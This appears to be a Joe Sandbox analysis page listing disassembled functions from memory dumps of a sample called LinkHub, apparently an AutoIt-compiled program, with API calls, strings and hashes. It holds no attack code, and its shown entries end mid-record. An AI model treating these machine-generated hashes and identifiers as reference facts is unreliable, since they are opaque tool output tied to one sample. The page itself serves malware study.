Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free
String ID: Y,$Y,
API String ID: 269201875-2701591941
Opcode ID: 261c0559e83919f23ee2ac345d8294cd50485d5c33bbebdd607fad928f5fa895
Instruction ID: 767582c6001b60c362fc33761ecb1aed1d664d2f1596271cb54a66f3c31e2e9d
Opcode Fuzzy Hash: 261c0559e83919f23ee2ac345d8294cd50485d5c33bbebdd607fad928f5fa895
Instruction Fuzzy Hash: 5F417172A006158FCB18CF6DD88456EB7F2EF8D310B1581AEE615EB3A0D7349C41DB51

Function 00E64008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00E640BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E640F8

Strings

static, xrefs: 00E64058

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 91ae6da5eccfc230f78b96a3f37358fce16e55fddcc9dc731725677742ecbae3
Instruction ID: ecb812aadfbd3f69f4786559db673951ff67aa3db4c30730acfd4cb76cd60f59
Opcode Fuzzy Hash: 91ae6da5eccfc230f78b96a3f37358fce16e55fddcc9dc731725677742ecbae3
Instruction Fuzzy Hash: C631C1B1540614AEDB20DF78DC80FFB73A8FF487A4F009619F995A7190DA70AC81DB61

Function 00E64FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00E650BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E650D2

Strings

', xrefs: 00E6502C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 35b444988856a58c2c2377ca6eb84444d68d34e43dd1aa201e8de4483675f4ce
Instruction ID: 970a45ef13602bfe28b95a9bfb81545988896e4d2287ac461054e93e8ca4346f
Opcode Fuzzy Hash: 35b444988856a58c2c2377ca6eb84444d68d34e43dd1aa201e8de4483675f4ce
Instruction Fuzzy Hash: 3E314575B0060A9FDB44CFA9D880BEABBB5FF49344F20506AE904AB391D771E945CF90

Function 00DD20B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

Part of subcall function 00DD2234: GetWindowLongW.USER32(?,000000EB), ref: 00DD2242

GetParent.USER32(?), ref: 00E13440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00E134CA

Strings

(, xrefs: 00DD20B9

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (
API String ID: 2181805148-2063206799
Opcode ID: 3520e511e2e7962241090114ce6047edb405a9721c8a9eb16485c93ad56ec79d
Instruction ID: 467acd83efcd3b26c36b0a1f7b9e4cacd4a5a3157de6f733d69f221e2e917e02
Opcode Fuzzy Hash: 3520e511e2e7962241090114ce6047edb405a9721c8a9eb16485c93ad56ec79d
Instruction Fuzzy Hash: C6218030601244AFCB269F78CC4ADF93B66EF56364F184245F6256B3E2C3319E95D620

Function 00E641AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00DD7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DD78B1
Part of subcall function 00DD7873: GetStockObject.GDI32(00000011), ref: 00DD78C5
Part of subcall function 00DD7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD78CF

GetWindowRect.USER32(00000000,?), ref: 00E64216
GetSysColor.USER32(00000012), ref: 00E64230

Strings

static, xrefs: 00E641F3

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3c944f7109dcafc3c3403c56f5fc5db614e2cfa7936c993711e6bdd12e21339c
Instruction ID: d3eac0457f1d8ef9e95af79ecaf11febff72cf2c0ed185967dda7dfadc7a37c2
Opcode Fuzzy Hash: 3c944f7109dcafc3c3403c56f5fc5db614e2cfa7936c993711e6bdd12e21339c
Instruction Fuzzy Hash: DB1156B2A50209AFDB00DFA8DC45AEA7BE8EB08358F105524F955E32A0E674E8509B60

Function 00E4D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E4D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E4D7EB

Strings

<local>, xrefs: 00E4D7AB

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: a44848cb26899e52cca49f2938aa3876f571f2d46077f186f3abcacf1e073623
Instruction ID: 937a240e361e21506a92463867ff050142534b5cde846a3eb9e78b5673619cc2
Opcode Fuzzy Hash: a44848cb26899e52cca49f2938aa3876f571f2d46077f186f3abcacf1e073623
Instruction Fuzzy Hash: 93112571609232BEDB344B62AC4DEF7BE9CEB127E8F00522BF509A3080D2649844D2F0

Function 00E375ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

CharUpperBuffW.USER32(?,?,?), ref: 00E3761D
_wcslen.LIBCMT ref: 00E37629

Strings

STOP, xrefs: 00E37623, 00E37628

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: f0964831c0ba7e323e83b0047501c116301c9eacd0e5df924e502f014604374b
Instruction ID: be249f9d38cf14526156c7481483cea410ac12dc3aa8d380f0a7296fe3a64f32
Opcode Fuzzy Hash: f0964831c0ba7e323e83b0047501c116301c9eacd0e5df924e502f014604374b
Instruction Fuzzy Hash: D60108726149278BCB309EBDCC6A9BF7BB5AB50368F411525E462A2290EB31D804C260

Function 00E3262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E34620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E32699

Strings

ComboBox, xrefs: 00E32638
ListBox, xrefs: 00E32663

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 2a22d9806449376518ff51b537c83ea309151e30a27bdfe8ae0a9947de8eef92
Instruction ID: 18b1d3be6dc5af56e660990acccd1ae5a16c1c4fdfec1e9278264bdf091675d0
Opcode Fuzzy Hash: 2a22d9806449376518ff51b537c83ea309151e30a27bdfe8ae0a9947de8eef92
Instruction Fuzzy Hash: D201B5B5A00214ABCF04AB64CC5ADFE7B68EF45364F50161BE572B73C1EA315808C660

Function 00E32525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E34620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00E32593

Strings

ComboBox, xrefs: 00E32532
ListBox, xrefs: 00E3255D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: eb37dec72695ae7b6782f671a4779d34719274b092a6329ce3e90283a12ac864
Instruction ID: 0eebc3fa50fea5583873026a56b15463dda171ce8f7bda9d113e931162db32c3
Opcode Fuzzy Hash: eb37dec72695ae7b6782f671a4779d34719274b092a6329ce3e90283a12ac864
Instruction Fuzzy Hash: 750184B5A40104BBCF05E7A0C966EFE7BA9DF55744F50101BA942B3281EA509B08D6B2

Function 00E325A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E34620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00E32615

Strings

ComboBox, xrefs: 00E325B6
ListBox, xrefs: 00E325E1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: de6efaf9eea38733ee8cd833d1e3d6cd5353d23af89ef6793e94c8e42c88e031
Instruction ID: abcb89d7737f02639b05ff359fc3e43c355d85bb35d4fd6582bd36142c6072a0
Opcode Fuzzy Hash: de6efaf9eea38733ee8cd833d1e3d6cd5353d23af89ef6793e94c8e42c88e031
Instruction Fuzzy Hash: F301DB75E44204B7CF15E750D916EFF7BA8DF05744F50201BB942B3281EB519E08D6B1

Function 00E326B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E34620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E32720

Strings

ComboBox, xrefs: 00E326C2
ListBox, xrefs: 00E326ED

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: a68358f2b962734c2459c53747e797ce4a65d89913dc41c7275c0292f6729e2a
Instruction ID: 68c4bf820860403ba264346d0166f38428a934050c121a7e5b7571e9d8702b45
Opcode Fuzzy Hash: a68358f2b962734c2459c53747e797ce4a65d89913dc41c7275c0292f6729e2a
Instruction Fuzzy Hash: 92F0A475A40214ABCB15A7A49C5AFFE7BA8EF05754F50291BF562B32C1EB61680CC270

Function 00E69AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00E69B6D

Part of subcall function 00DD2234: GetWindowLongW.USER32(?,000000EB), ref: 00DD2242

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E69B53

Strings

(, xrefs: 00E69B06

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: (
API String ID: 982171247-2063206799
Opcode ID: 5e1a6d67dc97be464a62ca1dc02cca5bbbd1eb654171c99be3172acc3325df8c
Instruction ID: 0695552ec9c1d839589709ae5e5cad50828b3481fdd2ae3d959b335e146e3789
Opcode Fuzzy Hash: 5e1a6d67dc97be464a62ca1dc02cca5bbbd1eb654171c99be3172acc3325df8c
Instruction Fuzzy Hash: 4B01D430244214AFCB259F15FC44F663F6AFF853A8F100519FA423B2E1C7726805DB64

Function 00E03A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

Strings

2<, xrefs: 00E03A64
j3, xrefs: 00E03A88

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID: 2<$j3
API String ID: 0-463933582
Opcode ID: c898f2029c80330e65bcf00bfe70a47aac3cb0443a99d86ca752c265ffee7b09
Instruction ID: 90d64b4f3dbc092767d0d131710b559ec7e2706686eee0246d60bf43b960bf07
Opcode Fuzzy Hash: c898f2029c80330e65bcf00bfe70a47aac3cb0443a99d86ca752c265ffee7b09
Instruction Fuzzy Hash: 37F09025604149AADB149BA1CC40AFA73BCDB04740F50406ABCC9E72D0FA748FD4D365

Function 00E68432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

GetWindowLongW.USER32(?,000000F0), ref: 00E68471
GetWindowLongW.USER32(?,000000EC), ref: 00E6847F

Strings

(, xrefs: 00E6843E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LongWindow
String ID: (
API String ID: 1378638983-2063206799
Opcode ID: 3290be1845255bce0f1e693b7719530ea479966a4357a6f262a3ef497201ee9b
Instruction ID: 7b0481af0841f6d73ce0d178f523286b44253db57fa00ec1a48f36686af59770
Opcode Fuzzy Hash: 3290be1845255bce0f1e693b7719530ea479966a4357a6f262a3ef497201ee9b
Instruction Fuzzy Hash: 43F049316452459FC704DF69EC44D6A77A5EB8A764B10462EFA26AB3F1CF30A804DB10

Function 00E31461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E3146F

Strings

AutoIt, xrefs: 00E31463
Error allocating memory., xrefs: 00E31468

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 61828dbb60f26b6ddbc96d1c612c06eabffc5b28b8f9478de45ff4de7037df26
Instruction ID: 5bc7cd0437a10b577784c7dae4695091de218fbf60758de2e34128e2226bf60a
Opcode Fuzzy Hash: 61828dbb60f26b6ddbc96d1c612c06eabffc5b28b8f9478de45ff4de7037df26
Instruction Fuzzy Hash: 1BE0D83178871C3AD3102794BC07F997A84CF04B91F12841AF748B55C38EE2249082B9

Function 00DF10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00DEFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DF10E2,?,?,?,00DD100A), ref: 00DEFAD9

IsDebuggerPresent.KERNEL32(?,?,?,00DD100A), ref: 00DF10E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DD100A), ref: 00DF10F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DF10F0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 62292defbeb7cb1a9915c9c10d79c6789a298858ec04ae627cf84d07102c07d2
Instruction ID: 499c6056ef9bb98fe9d3df91fa80fdc490bfa37a1c5e0cc509e3131e25675660
Opcode Fuzzy Hash: 62292defbeb7cb1a9915c9c10d79c6789a298858ec04ae627cf84d07102c07d2
Instruction Fuzzy Hash: 11E06D74A00751CFD7209F2AE805312BBE4EB04345F05C92DE985E2651DBB4E488CBB1

Function 00DEF114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DEF151

Strings

h5, xrefs: 00DEF146
`5, xrefs: 00DEF131

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID: `5$h5
API String ID: 1385522511-2563461917
Opcode ID: c646b3e7b2f188925a76ed02aa93771ad4d44dcf3a4206567571f9f35f36de93
Instruction ID: c1a5ad52d648ab2c06ebf32a11892ad37e4253948f4259ae5faface4f4569387
Opcode Fuzzy Hash: c646b3e7b2f188925a76ed02aa93771ad4d44dcf3a4206567571f9f35f36de93
Instruction Fuzzy Hash: C0E02031C04A5CCFC504F73DD8019947390F74E320B3901F4F1055B39197203A42D634

Function 00E439D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E439F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E43A05

Strings

aut, xrefs: 00E439F9

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: e370d68c2f496f52d54d6166c22d680c523bc0fb296e2987344354c76aaecfa1
Instruction ID: 16ce39039f7d3fc777ad54ab6357254f6262c238bdfaa9e21cd59853144c6dbd
Opcode Fuzzy Hash: e370d68c2f496f52d54d6166c22d680c523bc0fb296e2987344354c76aaecfa1
Instruction Fuzzy Hash: 8CD05B71904314BBDA209755EC0DFCB7A6CDB44750F400191FA95A10A1DAF0D549C7D0

Function 00E62DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E62E08
PostMessageW.USER32(00000000), ref: 00E62E0F

